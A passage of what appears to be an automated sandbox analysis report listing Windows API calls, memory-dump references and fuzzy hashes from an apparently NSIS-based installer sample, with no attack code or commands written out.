                                                                                              • Associated: 00000004.00000002.2969253456.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2969292369.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2969311384.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2969337991.0000000000462000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2969337991.0000000000465000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2969337991.0000000000472000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2969337991.0000000000480000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2969337991.0000000000487000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2969337991.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2969337991.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2969337991.0000000000493000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_400000_rFa24c148.jbxd
                                                                                              Similarity
                                                                                              • API ID: ItemTextlstrlenwsprintf
                                                                                              • String ID: %u.%u%s%s
                                                                                              • API String ID: 3540041739-3551169577
                                                                                              • Opcode ID: a2fadf25a80c14b51bfb926aaeebc4ecf81a38fefb846c632a4bc85b75721053
                                                                                              • Instruction ID: 59e17c8afd225f679fed4f3ac3ee25800eeb16d6bc796772b25e59257c8be9d1
                                                                                              • Opcode Fuzzy Hash: a2fadf25a80c14b51bfb926aaeebc4ecf81a38fefb846c632a4bc85b75721053
                                                                                              • Instruction Fuzzy Hash: FB11E2776002243BDB10666D9C49EEF369DDBC6334F14863BFA29F61D1E978881186E8
                                                                                              APIs
                                                                                              • SendMessageTimeoutW.USER32(00000000,00000000,?,?,?,00000002,?), ref: 00401C2A
                                                                                              • SendMessageW.USER32(00000000,00000000,?,?), ref: 00401C42
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.2969273046.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000004.00000002.2969253456.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2969292369.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2969311384.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2969337991.0000000000462000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2969337991.0000000000465000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2969337991.0000000000472000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2969337991.0000000000480000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2969337991.0000000000487000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2969337991.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2969337991.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2969337991.0000000000493000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_400000_rFa24c148.jbxd
                                                                                              Similarity
                                                                                              • API ID: MessageSend$Timeout
                                                                                              • String ID: !
                                                                                              • API String ID: 1777923405-2657877971
                                                                                              • Opcode ID: 9509e5e7a0907e764604f6084ff3dd6a46145b46d1e6bef9a99a17c67a449adc
                                                                                              • Instruction ID: 32ea72146a28600a98e99adc179119cd295c2a32732311222b232d5c22eb20b7
                                                                                              • Opcode Fuzzy Hash: 9509e5e7a0907e764604f6084ff3dd6a46145b46d1e6bef9a99a17c67a449adc
                                                                                              • Instruction Fuzzy Hash: 8B217471A44109BEDF019FB0C94AFAD7B75EF44748F20413AF502B61D1D6B8A941DB18
                                                                                              APIs
                                                                                              • RegCreateKeyExW.ADVAPI32(00000000,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 0040236F
                                                                                              • lstrlenW.KERNEL32(0040A550,00000023,?,?,?,?,?,?,?,00000011,00000002), ref: 0040238F
                                                                                              • RegSetValueExW.ADVAPI32(?,?,?,?,0040A550,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 004023CB
                                                                                              • RegCloseKey.ADVAPI32(?,?,?,0040A550,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 004024AC
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.2969273046.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000004.00000002.2969253456.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2969292369.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2969311384.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2969337991.0000000000462000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2969337991.0000000000465000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2969337991.0000000000472000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2969337991.0000000000480000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2969337991.0000000000487000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2969337991.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2969337991.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2969337991.0000000000493000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_400000_rFa24c148.jbxd
                                                                                              Similarity
                                                                                              • API ID: CloseCreateValuelstrlen
                                                                                              • String ID:
                                                                                              • API String ID: 1356686001-0
                                                                                              • Opcode ID: 5ece5b1e46cf5f1f204aeaf3e6a23d396b345020fae2ed77ba4f016eeb832ab1
                                                                                              • Instruction ID: ff9c26e96d548ba14907c7cf0d775baaea3cd420635c28ab46d49cad89ffe0f3
                                                                                              • Opcode Fuzzy Hash: 5ece5b1e46cf5f1f204aeaf3e6a23d396b345020fae2ed77ba4f016eeb832ab1
                                                                                              • Instruction Fuzzy Hash: 311181B1A00108BEEB10AFA4DD49EAF777CEB50358F10443AF905B61D0D7B85D409A29
                                                                                              APIs
                                                                                                • Part of subcall function 0040586D: CharNextW.USER32(?,?,00424EA0,?,004058E1,00424EA0,00424EA0,00436800,?,74DF3420,0040561F,?,00436800,74DF3420,00434000), ref: 0040587B
                                                                                                • Part of subcall function 0040586D: CharNextW.USER32(00000000), ref: 00405880
                                                                                                • Part of subcall function 0040586D: CharNextW.USER32(00000000), ref: 00405898
                                                                                              • CreateDirectoryW.KERNEL32(?,?,00000000,0000005C,00000000,000000F0), ref: 004015E3
                                                                                              • GetLastError.KERNEL32(?,00000000,0000005C,00000000,000000F0), ref: 004015ED
                                                                                              • GetFileAttributesW.KERNEL32(?,?,00000000,0000005C,00000000,000000F0), ref: 004015FD
                                                                                              • SetCurrentDirectoryW.KERNEL32(?,00435000,?,00000000,000000F0), ref: 00401630
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.2969273046.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000004.00000002.2969253456.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2969292369.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2969311384.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2969337991.0000000000462000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2969337991.0000000000465000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2969337991.0000000000472000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2969337991.0000000000480000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2969337991.0000000000487000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2969337991.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2969337991.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2969337991.0000000000493000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_400000_rFa24c148.jbxd
                                                                                              Similarity
                                                                                              • API ID: CharNext$Directory$AttributesCreateCurrentErrorFileLast
                                                                                              • String ID:
                                                                                              • API String ID: 3751793516-0
                                                                                              • Opcode ID: 53cec99a44b5501f79705a11811158959523dda88924113c706af1bde306e0ba
                                                                                              • Instruction ID: f9b53a9290970587256920563605d3a8fa34613ebd87cabe797d0c7397107685
                                                                                              • Opcode Fuzzy Hash: 53cec99a44b5501f79705a11811158959523dda88924113c706af1bde306e0ba
                                                                                              • Instruction Fuzzy Hash: 9711C631904104EBCF206FA0DD449AE76B1EF14369F34493BF881B61E1D63D49419A5D
                                                                                              APIs
                                                                                              • GetFileVersionInfoSizeW.VERSION(00000000,?,000000EE), ref: 00401F17
                                                                                              • GlobalAlloc.KERNEL32(00000040,00000000,00000000,?,000000EE), ref: 00401F39
                                                                                              • GetFileVersionInfoW.VERSION(?,?,00000000,00000000), ref: 00401F50
                                                                                              • VerQueryValueW.VERSION(?,00409014,?,?,?,?,00000000,00000000), ref: 00401F69
                                                                                                • Part of subcall function 00405CBE: wsprintfW.USER32 ref: 00405CCB
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.2969273046.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000004.00000002.2969253456.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2969292369.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2969311384.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2969337991.0000000000462000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2969337991.0000000000465000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2969337991.0000000000472000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2969337991.0000000000480000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2969337991.0000000000487000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2969337991.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2969337991.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2969337991.0000000000493000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_400000_rFa24c148.jbxd
                                                                                              Similarity
                                                                                              • API ID: FileInfoVersion$AllocGlobalQuerySizeValuewsprintf
                                                                                              • String ID:
                                                                                              • API String ID: 1404258612-0
                                                                                              • Opcode ID: a69f105ff7c1ed7042804ff3785ec88b73d7adcb7f3cde9c988f9f75693ffed6
                                                                                              • Instruction ID: c80361359d7f931d767c6e620dd41e9efa8b0f2766ef6758dcd107922aa8e93c
                                                                                              • Opcode Fuzzy Hash: a69f105ff7c1ed7042804ff3785ec88b73d7adcb7f3cde9c988f9f75693ffed6
                                                                                              • Instruction Fuzzy Hash: 8E110671A00109AEEB11DFA5C945DEEBBB9EF44344F21407AF901F62A1D7349E50DB68
                                                                                              APIs
                                                                                                • Part of subcall function 00405021: lstrlenW.KERNEL32(00421678,00000000,?,00000000,?,?,?,?,?,?,?,?,?,004030DB,00000000,?), ref: 00405059
                                                                                                • Part of subcall function 00405021: lstrlenW.KERNEL32(004030DB,00421678,00000000,?,00000000,?,?,?,?,?,?,?,?,?,004030DB,00000000), ref: 00405069
                                                                                                • Part of subcall function 00405021: lstrcatW.KERNEL32(00421678,004030DB,004030DB,00421678,00000000,?,00000000), ref: 0040507C
                                                                                                • Part of subcall function 00405021: SetWindowTextW.USER32(00421678,00421678), ref: 0040508E
                                                                                                • Part of subcall function 00405021: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 004050B4
                                                                                                • Part of subcall function 00405021: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 004050CE
                                                                                                • Part of subcall function 00405021: SendMessageW.USER32(?,00001013,?,00000000), ref: 004050DC
                                                                                                • Part of subcall function 004054F2: CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,004256A0,Error launching installer), ref: 00405517
                                                                                                • Part of subcall function 004054F2: CloseHandle.KERNEL32(?), ref: 00405524
                                                                                              • WaitForSingleObject.KERNEL32(00000000,00000064,00000000,000000EB,00000000), ref: 00401E80
                                                                                              • WaitForSingleObject.KERNEL32(?,00000064,0000000F), ref: 00401E95
                                                                                              • GetExitCodeProcess.KERNEL32(?,?), ref: 00401EA2
                                                                                              • CloseHandle.KERNEL32(?,00000000,000000EB,00000000), ref: 00401EC9
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.2969273046.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000004.00000002.2969253456.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2969292369.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2969311384.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2969337991.0000000000462000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2969337991.0000000000465000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2969337991.0000000000472000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2969337991.0000000000480000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2969337991.0000000000487000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2969337991.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2969337991.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2969337991.0000000000493000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_400000_rFa24c148.jbxd
                                                                                              Similarity
                                                                                              • API ID: MessageSend$CloseHandleObjectProcessSingleWaitlstrlen$CodeCreateExitTextWindowlstrcat
                                                                                              • String ID:
                                                                                              • API String ID: 3585118688-0
                                                                                              • Opcode ID: d0da5d482e33d051210c15b68974d9b824af578114fa889f143a46eb6b727379
                                                                                              • Instruction ID: bec0dc1b772bef8e3dfa3c1b84bb43adcf6872ff1fa5701b8d2c68c635bc108f
                                                                                              • Opcode Fuzzy Hash: d0da5d482e33d051210c15b68974d9b824af578114fa889f143a46eb6b727379
                                                                                              • Instruction Fuzzy Hash: 2811A131D04204EBDF109FA0CD859DE7AB5EB04319F204437F501BA1E1C3798982DB9A
                                                                                              APIs
                                                                                              • DestroyWindow.USER32(?,00000000,00402EE5,00000001,?,?,?,00000000,00403425,?), ref: 00402D18
                                                                                              • GetTickCount.KERNEL32 ref: 00402D36
                                                                                              • CreateDialogParamW.USER32(0000006F,00000000,00402C7F,00000000), ref: 00402D53
                                                                                              • ShowWindow.USER32(00000000,00000005,?,?,?,00000000,00403425,?), ref: 00402D61
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.2969273046.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000004.00000002.2969253456.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2969292369.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2969311384.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2969337991.0000000000462000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2969337991.0000000000465000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2969337991.0000000000472000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2969337991.0000000000480000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2969337991.0000000000487000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2969337991.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2969337991.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2969337991.0000000000493000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_400000_rFa24c148.jbxd
                                                                                              Similarity
                                                                                              • API ID: Window$CountCreateDestroyDialogParamShowTick
                                                                                              • String ID:
                                                                                              • API String ID: 2102729457-0
                                                                                              • Opcode ID: a44779084e06eb4c2f5f1059993455e157fff419ca32818d5ef93385285d2376
                                                                                              • Instruction ID: 4886259ddd31cdb6a9694f28afcf93f0b8e262fe2de839e253ac22cc8a8e0fbd
                                                                                              • Opcode Fuzzy Hash: a44779084e06eb4c2f5f1059993455e157fff419ca32818d5ef93385285d2376
                                                                                              • Instruction Fuzzy Hash: 09F05E3198A221ABD6315B20FE4C99B7BA4FB05B11B14547AF005F11E4C2B84C81CB9C
                                                                                              APIs
                                                                                              • IsWindowVisible.USER32(?), ref: 00404FC4
                                                                                              • CallWindowProcW.USER32(?,?,?,?), ref: 00405015
                                                                                                • Part of subcall function 00404008: SendMessageW.USER32(?,00000000,00000000,00000000), ref: 0040401A
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.2969273046.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000004.00000002.2969253456.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2969292369.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2969311384.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2969337991.0000000000462000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2969337991.0000000000465000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2969337991.0000000000472000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2969337991.0000000000480000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2969337991.0000000000487000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2969337991.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2969337991.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2969337991.0000000000493000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_400000_rFa24c148.jbxd
                                                                                              Similarity
                                                                                              • API ID: Window$CallMessageProcSendVisible
                                                                                              • String ID:
                                                                                              • API String ID: 3748168415-3916222277
                                                                                              • Opcode ID: d9e9b5ae7c041b12dac160d84c9107cc66b3c7e025393d4bf5171a64b49731b5
                                                                                              • Instruction ID: 66009aff32d7b8830e361c6277d22b8a437e9b10976337e76806f1b42b6c8603
                                                                                              • Opcode Fuzzy Hash: d9e9b5ae7c041b12dac160d84c9107cc66b3c7e025393d4bf5171a64b49731b5
                                                                                              • Instruction Fuzzy Hash: 7A017172100609ABDF209F11DD80A5F3A25E784318F204037FB00761D1C37A9D51DAAE
                                                                                              APIs
                                                                                              • GetTickCount.KERNEL32 ref: 00405A30
                                                                                              • GetTempFileNameW.KERNEL32(?,?,00000000,?,?,?,00000000,004031FD,00436000,00436800), ref: 00405A4B
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.2969273046.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000004.00000002.2969253456.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2969292369.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2969311384.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2969337991.0000000000462000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2969337991.0000000000465000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2969337991.0000000000472000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2969337991.0000000000480000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2969337991.0000000000487000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2969337991.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2969337991.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2969337991.0000000000493000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_400000_rFa24c148.jbxd
                                                                                              Similarity
                                                                                              • API ID: CountFileNameTempTick
                                                                                              • String ID: nsa
                                                                                              • API String ID: 1716503409-2209301699
                                                                                              • Opcode ID: 7292a228a83fa3ff922d64c5f727ba47b2c13c899f9c2b13fefe68a2db1948d4
                                                                                              • Instruction ID: 95f7d282eddd658cc867a71ae78a7f6d6a22d0bd0d4c40af2882d7f7832b811b
                                                                                              • Opcode Fuzzy Hash: 7292a228a83fa3ff922d64c5f727ba47b2c13c899f9c2b13fefe68a2db1948d4
                                                                                              • Instruction Fuzzy Hash: 68F03676700204BBDB009F55DD45F9F77A8EBD5710F10813AE905F7190E6B0AE548B64
                                                                                              APIs
                                                                                              • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,004256A0,Error launching installer), ref: 00405517
                                                                                              • CloseHandle.KERNEL32(?), ref: 00405524
                                                                                              Strings
                                                                                              • Error launching installer, xrefs: 00405505
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.2969273046.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000004.00000002.2969253456.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2969292369.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2969311384.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2969337991.0000000000462000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2969337991.0000000000465000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2969337991.0000000000472000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2969337991.0000000000480000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2969337991.0000000000487000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2969337991.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2969337991.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2969337991.0000000000493000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_400000_rFa24c148.jbxd
                                                                                              Similarity
                                                                                              • API ID: CloseCreateHandleProcess
                                                                                              • String ID: Error launching installer
                                                                                              • API String ID: 3712363035-66219284
                                                                                              • Opcode ID: 3b6d012946cdb1e415ed4126777acf452f9caf94abf9bf389c8640f9b16c30f7
                                                                                              • Instruction ID: f26dffa8f28471d2a1f864ee7fcc23407611118f3e7675527ed35a3aab9678e5
                                                                                              • Opcode Fuzzy Hash: 3b6d012946cdb1e415ed4126777acf452f9caf94abf9bf389c8640f9b16c30f7
                                                                                              • Instruction Fuzzy Hash: A2E0ECB4A00209AFDB009F64EC49E6B7BBDEB04304BC08521A914F2290E774E9158A69
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.2969273046.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000004.00000002.2969253456.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2969292369.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2969311384.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2969337991.0000000000462000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2969337991.0000000000465000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2969337991.0000000000472000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2969337991.0000000000480000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2969337991.0000000000487000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2969337991.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2969337991.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2969337991.0000000000493000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_400000_rFa24c148.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 9404108dc2ffa93cf9dbd592045f3814a42928f44e5f517cd318150646a2bbb9
                                                                                              • Instruction ID: a6beba8b11f6780db01d9b07fb449380a5bf126b8b7197de7c08299569837353
                                                                                              • Opcode Fuzzy Hash: 9404108dc2ffa93cf9dbd592045f3814a42928f44e5f517cd318150646a2bbb9
                                                                                              • Instruction Fuzzy Hash: 32A14471E00228CBDF28CFA8C8946ADBBB1FF45305F11856ED856BB281C7785A96DF44
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.2969273046.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000004.00000002.2969253456.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2969292369.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2969311384.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2969337991.0000000000462000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2969337991.0000000000465000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2969337991.0000000000472000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2969337991.0000000000480000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2969337991.0000000000487000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2969337991.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
